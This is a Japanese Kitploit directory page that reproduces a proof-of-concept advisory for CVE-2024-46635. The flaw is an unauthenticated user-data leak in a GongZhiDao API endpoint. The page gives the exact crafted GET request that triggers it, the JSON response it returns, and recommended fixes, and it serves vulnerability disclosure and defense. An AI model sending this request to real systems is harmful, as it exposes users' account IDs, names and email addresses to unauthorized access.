Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-46635 — CVE-2024-46635の概念実証:GongZhiDaoシステムのAPIエンドポイントにおける不適切な入力検証の脆弱性で、認証なしに機密ユーザー情報が漏洩します。 | Kitploit
ツール/GitHubGitHub/h1thub/cve-2024-46635
脆弱性分析情報収集ウェブセキュリティペネトレーションテスト設定ミスAPIセキュリティ
GitHubh1thub/cve-2024-46635

CVE-2024-46635

CVE-2024-46635の概念実証:GongZhiDaoシステムのAPIエンドポイントにおける不適切な入力検証の脆弱性で、認証なしに機密ユーザー情報が漏洩します。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-46635

背景

GongZhiDao システムは、GongZhiDao によって開発されたプラットフォームです。ユーザー管理、データ分析、運用機能などのエンタープライズ向けソリューションを提供します。しかし、適切な認可なしに機密ユーザー情報が露呈する可能性があるセキュリティ脆弱性が、あるAPIエンドポイントで発見されました。

脆弱性の説明

GongZhiDao システムの /oaa/api/AccountMaster/GetCurrentUserInfo API エンドポイントに脆弱性が存在します。UserNameOrPhoneNumber パラメータの代わりに %20(URLエンコードされたスペース)を渡すと、適切な認証や認可がなくても、API がアカウントID、ユーザー名、メールアドレスなどの機密ユーザー情報を応答します。この不適切な入力検証により、攻撃者は不正に機密データにアクセスできます。

影響

この脆弱性が悪用されると、以下の機密ユーザーデータが露呈する可能性があります。

  • アカウントID
  • ユーザー名
  • メールアドレス
  • 電話番号(存在する場合)
  • その他の個人情報

攻撃者はこの情報を利用して、なりすましやフィッシングなどのさらなる攻撃を仕掛ける可能性があります。

攻撃ベクトル

脆弱性を悪用するには、攻撃者は対象の脆弱なAPIエンドポイントに細工したHTTP GETリクエストを送信する必要があります。

root@kitploit:~
GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2

このリクエストは、機密ユーザーデータをJSON形式で含む200 OKレスポンスを返します。

root@kitploit:~
HTTP/2 200 OK
Date: Tue, 10 Sep 2024 03:25:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 153
Server: nginx/1.22.0
X-Powered-By: ASP.NET
Set-Cookie: Path=/; HttpOnly; Secure

{"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}

技術詳細

  • 影響を受けるエンドポイント: /oaa/api/AccountMaster/GetCurrentUserInfo
  • メソッド: HTTP GET
  • パラメータ: UserNameOrPhoneNumber に %20 を入力
  • レスポンス: 適切な入力検証や認可なしに、JSON形式で機密ユーザーデータを返す
  • 脆弱性タイプ: 不適切な入力検証 / 機密情報の開示

修正推奨事項

  1. 適切な入力検証の実装: UserNameOrPhoneNumber パラメータが適切にサニタイズされ、検証されるようにします。%20 のような入力は拒否する必要があります。

  2. 認可チェック: 認証され、許可されたユーザーのみが機密情報にアクセスできるように、適切な認可メカニズムを実装します。

  3. レート制限と監視: APIエンドポイントにレート制限を適用してブルートフォースや自動化攻撃を防ぎ、APIアクティビティを監視して異常なアクセスパターンを検出します。

クレジット

この脆弱性は hithub によって発見されました。

参考文献

  • CWE-20: 不適切な入力検証
ツールをダウンロード